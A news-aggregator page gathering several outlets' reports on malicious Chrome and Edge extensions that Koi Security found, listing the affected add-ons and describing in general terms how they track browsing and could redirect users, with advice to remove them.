Latest news with #KoiSecurity
Scottish Sun
4 days ago
- Scottish Sun
All Chrome users must delete 11 apps downloaded over two million times NOW as experts issue ‘tracker' warning
Add-ons can steal browser activity and redirect users to potentially unsafe web addresses APP-SURD All Chrome users must delete 11 apps downloaded over two million times NOW as experts issue 'tracker' warning Click to share on X/Twitter (Opens in new window) Click to share on Facebook (Opens in new window) THOUSANDS of Chrome users are being urged to delete immediately certain apps that pose a security risk. It comes after experts issued a "tracker" warning on 11 apps that have been downloaded more than two million times. Sign up for Scottish Sun newsletter Sign up 1 Chrome is used by billion of people every day Credit: Apple The apps can track users, steal browser activity, and redirect to potentially unsafe web addresses. 3.45b users choose Chrome to surf the web Chrome is the most popular internet browser with an estimated 3.45 billion users, according to the latest statistics. Most of the add-ons provide the advertised functionality and pose as legitimate tools like colour pickers, VPNs, volume boosters, and emoji keyboards. Researchers at Koi Security, a company providing a platform for security self-provisioned software, discovered the malicious extensions in Chrome Web Store and reported them to Google. Researchers noted that many of those extensions are verified. They also report hundreds of positive reviews, and were featured prominently on the Chrome Web Store. This, the researchers note, could have misled users about their safety. Add-ons to check and remove Users should check for the following add-ons in Chrome browser and remove them as soon as possible: Color Picker, Eyedropper — Geco colorpick Emoji keyboard online — copy&paste your emoji Free Weather Forecast Video Speed Controller — Video manager Unlock Discord — VPN Proxy to Unblock Discord Anywhere Dark Theme — Dark Reader for Chrome Volume Max — Ultimate Sound Booster Unblock TikTok — Seamless Access with One-Click Proxy Unlock YouTube VPN Unlock TikTok Weather One of them, Volume Max — Ultimate Sound Booster, has also been flagged by LayerX researchers last month, who warned about its potential for spying on users. However, no malicious activity could be confirmed at the time. Urgent warning to delete 2 dangerous apps that STEAL all photos & blackmail you According to the researchers, the malicious functionality is implemented in the background service worker of each extension using the Chrome Extensions API, registering a listener that is triggered every time a user navigates to a new webpage. The listener captures the URL of the visited page and exfiltrates the information to a remote server along with a unique tracking ID for each user. The server can respond with redirection URLs, hijacking the user's browsing activity and potentially taking them to unsafe destinations that may enable cyberattacks. Although the possibility is there, it should be noted that Koi Security has not observed malicious redirections in their testing. Cybercriminals at large It comes after researchers at Koi Security discovered cybercriminals have also planted malicious extensions in the official store for Microsoft Edge, which shows a total count of 600,000 downloads. "Combined, these eighteen extensions have infected over 2.3 million users across both browsers, creating one of the largest browser hijacking operations we've documented," the researchers said. They recommend users remove all listed extensions immediately, clear the browsing data to purge any tracking identifiers, check the system for malware, and monitor accounts for suspicious activity. Google has confirmed that all the extensions Koi Security discovered have now been removed from the Chrome Web Store, according to Bleeping Computer.
The Irish Sun
4 days ago
- The Irish Sun
All Chrome users must delete 11 apps downloaded over two million times NOW as experts issue ‘tracker' warning
THOUSANDS of Chrome users are being urged to delete immediately certain apps that pose a security risk. It comes after experts issued a "tracker" warning on 11 apps that have been downloaded more than two million times. Advertisement 1 Chrome is used by billion of people every day Credit: Apple The apps can track users, steal browser activity, and redirect to potentially unsafe web addresses. 3.45b users choose Chrome to surf the web Most of the add-ons provide the advertised functionality and pose as legitimate tools like colour pickers, VPNs, volume boosters, and emoji keyboards. Researchers at Koi Security, a company providing a platform for security self-provisioned software, discovered the Advertisement READ MORE TECH NEWS Researchers noted that many of those extensions are verified. They also report hundreds of positive reviews, and were featured prominently on the Chrome Web Store. This, the researchers note, could have misled users about their safety. Add-ons to check and remove Users should check for the following add-ons in Chrome browser and remove them as soon as possible: Advertisement Most read in Tech Exclusive Color Picker, Eyedropper — Geco colorpick Emoji keyboard online — copy&paste your emoji Free Weather Forecast Video Speed Controller — Video manager Unlock Discord — VPN Proxy to Unblock Discord Anywhere Dark Theme — Dark Reader for Chrome Volume Max — Ultimate Sound Booster Unblock TikTok — Seamless Access with One-Click Proxy Unlock YouTube VPN Unlock TikTok Weather One of them, Volume Max — Ultimate Sound Booster, has also been flagged by LayerX researchers last month, who warned about its potential for spying on users. However, no malicious activity could be confirmed at the time. Urgent warning to delete 2 dangerous apps that STEAL all photos & blackmail you According to the researchers, the malicious functionality is implemented in the background service worker of each extension using the Chrome Extensions API, registering a listener that is triggered every time a user navigates to a new webpage. The listener captures the URL of the visited page and exfiltrates the information to a remote server along with a unique tracking ID for each user. Advertisement The server can respond with redirection URLs, Although the possibility is there, it should be noted that Koi Security has not observed malicious redirections in their testing. Cybercriminals at large It comes after researchers at Koi Security discovered cybercriminals have also planted malicious extensions in the official store for "Combined, these eighteen extensions have infected over 2.3 million users across both browsers, creating one of the largest browser hijacking operations we've documented," the researchers said. Advertisement They recommend users remove all listed extensions immediately, clear the browsing data to purge any tracking identifiers, check the system for malware, and monitor accounts for suspicious activity. Google has confirmed that all the extensions Koi Security discovered have now been removed from the Chrome Web Store, according to Bleeping Computer. The 11 apps on Chrome that pose a security risk Here are the 11 apps that Chrome users are being urged to delete NOW. Color Picker, Eyedropper — Geco colorpick Emoji keyboard online — copy&paste your emoji Free Weather Forecast Video Speed Controller — Video manager Unlock Discord — VPN Proxy to Unblock Discord Anywhere Dark Theme — Dark Reader for Chrome Volume Max — Ultimate Sound Booster Unblock TikTok — Seamless Access with One-Click Proxy Unlock YouTube VPN Unlock TikTok Weather
The Sun
4 days ago
- The Sun
All Chrome users must delete 11 apps downloaded over two million times NOW as experts issue ‘tracker' warning
THOUSANDS of Chrome users are being urged to delete immediately certain apps that pose a security risk. It comes after experts issued a "tracker" warning on 11 apps that have been downloaded more than two million times. 1 The apps can track users, steal browser activity, and redirect to potentially unsafe web addresses. 3.45b users choose Chrome to surf the web Chrome is the most popular internet browser with an estimated 3.45 billion users, according to the latest statistics. Most of the add-ons provide the advertised functionality and pose as legitimate tools like colour pickers, VPNs, volume boosters, and emoji keyboards. Researchers at Koi Security, a company providing a platform for security self-provisioned software, discovered the malicious extensions in Chrome Web Store and reported them to Google. Researchers noted that many of those extensions are verified. They also report hundreds of positive reviews, and were featured prominently on the Chrome Web Store. This, the researchers note, could have misled users about their safety. Add-ons to check and remove Users should check for the following add-ons in Chrome browser and remove them as soon as possible: Color Picker, Eyedropper — Geco colorpick Emoji keyboard online — copy&paste your emoji Free Weather Forecast Video Speed Controller — Video manager Unlock Discord — VPN Proxy to Unblock Discord Anywhere Dark Theme — Dark Reader for Chrome Volume Max — Ultimate Sound Booster Unblock TikTok — Seamless Access with One-Click Proxy Unlock YouTube VPN Unlock TikTok Weather One of them, Volume Max — Ultimate Sound Booster, has also been flagged by LayerX researchers last month, who warned about its potential for spying on users. However, no malicious activity could be confirmed at the time. Urgent warning to delete 2 dangerous apps that STEAL all photos & blackmail you According to the researchers, the malicious functionality is implemented in the background service worker of each extension using the Chrome Extensions API, registering a listener that is triggered every time a user navigates to a new webpage. The listener captures the URL of the visited page and exfiltrates the information to a remote server along with a unique tracking ID for each user. The server can respond with redirection URLs, hijacking the user's browsing activity and potentially taking them to unsafe destinations that may enable cyberattacks. Although the possibility is there, it should be noted that Koi Security has not observed malicious redirections in their testing. Cybercriminals at large It comes after researchers at Koi Security discovered cybercriminals have also planted malicious extensions in the official store for Microsoft Edge, which shows a total count of 600,000 downloads. "Combined, these eighteen extensions have infected over 2.3 million users across both browsers, creating one of the largest browser hijacking operations we've documented," the researchers said. They recommend users remove all listed extensions immediately, clear the browsing data to purge any tracking identifiers, check the system for malware, and monitor accounts for suspicious activity. Google has confirmed that all the extensions Koi Security discovered have now been removed from the Chrome Web Store, according to Bleeping Computer. The 11 apps on Chrome that pose a security risk Here are the 11 apps that Chrome users are being urged to delete NOW.
Express Tribune
5 days ago
- Express Tribune
Malicious Google Chrome extensions might be killing your system: Find out which ones
11 malicious extensions, with a total of 1.7 million downloads, have been found on Google's Chrome Web Store, posing significant risks to users by tracking their browsing activity and potentially redirecting them to harmful websites. The discovery was made by researchers at Koi Security, a platform for security self-provisioned software, who alerted Google to the issue, and was reported first by Bleeping Computer. The malicious extensions, which masquerade as useful tools such as color pickers, VPNs, volume boosters, and emoji keyboards, have received positive reviews and have been prominently featured on the store, making them appear legitimate to unsuspecting users. However, many of these extensions, despite being initially safe, later received updates that introduced malicious code. Some of the extensions have been removed from the Web Store, but many remain accessible. Users are advised to check for and uninstall the following extensions immediately: Color Picker, Eyedropper — Geco colorpick Emoji Keyboard Online — Copy&paste your emoji Free Weather Forecast Video Speed Controller — Video manager Unlock Discord — VPN Proxy to Unblock Discord Anywhere Dark Theme — Dark Reader for Chrome Volume Max — Ultimate Sound Booster Unblock TikTok — Seamless Access with One-Click Proxy Unlock YouTube VPN Unlock TikTok Weather One of the extensions, 'Volume Max — Ultimate Sound Booster', had previously been flagged by LayerX researchers for potential spying, although no malicious activity was confirmed at the time. The core issue lies in the background service worker of each extension, which uses the Chrome Extensions API to track users. A listener is triggered when users visit new webpages, capturing the URL and sending it to a remote server with a unique tracking ID. This server can then redirect users to unsafe sites, potentially leading to cyberattacks. However, Koi Security's testing has not yet observed any active redirections. The malicious code was not present in the initial versions of these extensions but was added later through updates. Google's auto-update system silently deployed these updated versions to users without their consent or interaction. This suggests that the extensions may have been compromised by external actors over time. ⚠️ Over 1.7 MILLION users impacted! Malicious Chrome extensions were found lurking on the Web Store. Is your browser safe? Check your extensions now! #ChromeSecurity #Cybersecurity — X CyberSec (@xcybersecnews) July 9, 2025 Further investigation revealed that similar malicious extensions had been found in the official store for Microsoft Edge, which have garnered 600,000 downloads. In total, the malicious extensions across both browsers have affected over 2.3 million users, marking one of the largest browser hijacking operations in recent memory. Koi Security recommends that users remove the listed extensions immediately, clear their browsing data to remove tracking identifiers, scan their systems for malware, and monitor their accounts for any suspicious activity.
Forbes
5 days ago
- Forbes
Delete Every Chrome And Edge Extension That's On This List
Is this threat hiding on your PC? Google Chrome and Microsoft Edge are under attack. The latest zero-day vulnerability was discovered by Google's own Threat Analysis Group and triggered a quiet configuration change for 'all users' and an emergency update. CVE-2025-6554 also prompted America's cyber defense agency to warn that this 'type confusion vulnerability could allow a remote attacker to perform arbitrary read/write via a crafted HTML page,' mandating government staff update by July 23. But there's another threat to Chrome and Edge that's hidden from view. In recent weeks, both LayerX and Symantec have warned of the very real dangers in the extensions installed by hundreds of millions of users from official stores. Now we have more of the same. Koi Security has just warned users to delete a list of 18 extensions if they're installed on their devices, extensions that present a real and present threat to those users and which have been installed millions of times. 'If you think a Chrome extension with Google's verified badge, 100,000+ installs, 800+ reviews, and featured placement on the store is trustworthy? Think again,' the team says, Once again, these dangerous add-ons 'perfectly demonstrate how sophisticated threat actors are exploiting the trust signals we rely on.' The extensions, Koi says, 'masquerade as popular productivity and entertainment tools across diverse categories: emoji keyboards, weather forecasts, video speed controllers, VPN proxies for Discord and TikTok, dark themes, volume boosters, and YouTube unblockers.' The type of trivial functionality that is catnip to users. The team says each extension 'provides legitimate functionality while secretly implementing the same browser surveillance and hijacking capabilities we discovered in the color picker.' It's the common ecosystem and code base that has enabled other security teams to unpick networks of dangerous extensions in the past. And again, some of these extensions 'have achieved verified status or featured placement across both the Chrome Web Store and Microsoft Edge Add-ons store, demonstrating that security failures extend across both major browser marketplaces.' The software is controlled through external command and control servers, each with a unique subdomain. But while this gives 'the appearance of separate operators,' they are 'actually part of the same centralized attack infrastructure.' Koi's team says 'immediate action is required' by affected users: The list of identified extensions is as follows: Google Chrome: Microsoft Edge: Some of these extensions have been removed from stories, but at the time of publishing, Koi reports many are still available. Check your own extensions against the list.
